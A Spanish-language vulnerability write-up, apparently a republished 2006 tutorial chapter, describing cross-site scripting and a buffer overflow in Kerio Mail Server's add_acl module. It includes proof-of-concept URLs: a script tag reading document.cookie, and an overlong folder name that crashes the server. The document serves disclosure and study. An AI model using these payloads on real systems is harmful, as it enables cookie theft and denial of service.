Buscar
Más buscado   Comunidades   Preguntas
Inicio / Wikis / Tutoriales / Multiples desbordamientos de buffer y cross site scripting en Kerio Mail Server - Módulo add_acl

Multiples desbordamientos de buffer y cross site scripting en Kerio Mail Server - Módulo add_acl

Tutorial creado por David F. Madrid. Extraido de: http://www.nautopia.net
21 de Febrero de 2006
Servidores de contenidosServidores de correoServidores web

3 - Módulo add_acl

Debido a un insuficiente filtrado de los caracteres contenidos por las variables de la petición HTTP cuyo contenido aparece por pantalla, se puede inyectar un script en el contexto de la página

http://[server]/add_acl?folder=~conde0@localhost/INBOX&add_name=<script>alert(document.cookie); </script>  

Si además situamos como folder ~admin@localhost/INBOX, el servidor se parará la pulsar en el enlace.

Además, el mismo desbordamiento de buffer se produce al utilizar un nombre de usuario largo, señal de que es la misma función la que produce el fallo

http://[server]/add_acl?folder=~AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA @localhost/INBOX&add_name=lucas
Valora este capítulo:
Autor y licencia de 'Multiples desbordamientos de buffer y cross site scripting en Kerio Mail Server - Módulo add_acl'
David F. Madrid Extraído de: http://www.nautopia.net

Creative Commons License Esta obra está bajo una licencia de Creative Commons.
Debe reconocer los créditos de la obra de la manera especificada por el autor o el licenciador.
Este contenido ha sido recopilado por el equipo de Wikilearning. Todo el contenido recopilado se ha obtenido respetando y comunicando en nuestro site la licencia de cada fuente.
Wikilearning tiene permiso expreso por escrito de los autores para publicar los contenidos que ha extraído de otras webs, incluyendo su uso comercial.

Opiniona sobre 'Multiples desbordamientos de buffer y cross site scripting en Kerio Mail Server - Módulo add_acl' (0)

Tu nombre debe tener tres caracteres como mínimo.
Es necesario que te des de alta con una cuenta de correo válida.
Es necesario que te des de alta con una cuenta de correo válida.
El contenido del título de tu opinión debe tener tres caracteres como mínimo.
Es obligatorio que selecciones una valoración del recurso.
El contenido del comentario de tu opinión debe tener tres caracteres como mínimo.

Opina sobre este tutorial
* Valoración:
* Nombre:
* Correo electrónico:
* Título:
* Comentario:

Wikis relacionados con 'Multiples desbordamientos de buffer y cross site scripting en Kerio Mail Server - Módulo add_acl'

PHP: Nociones Basicas
PHP es un lenguaje de programación diseñado específicamente para aplicaciones Web; las características más destacables... Más »
PHP: Nociones Basicas
PHP es un lenguaje de programación diseñado específicamente para aplicaciones Web; las características más destacables... Más »
Imagen empresarial
El video corporativo no es uno sólo, sino múltiples manifestaciones de una realidad, cuyas proyecciones... Más »
La poesía visual de Ángela Serna y de Julia Otxoa
Hablar de formas visuales en poesía es hablar de una tendencia experimental en la lírica... Más »
Los índices de cotización bursátil
Un índice puede ser definido como un instrumento estadístico que representa en forma abreviada y... Más »
¿Estás seguro de que deseas eliminar este capítulo?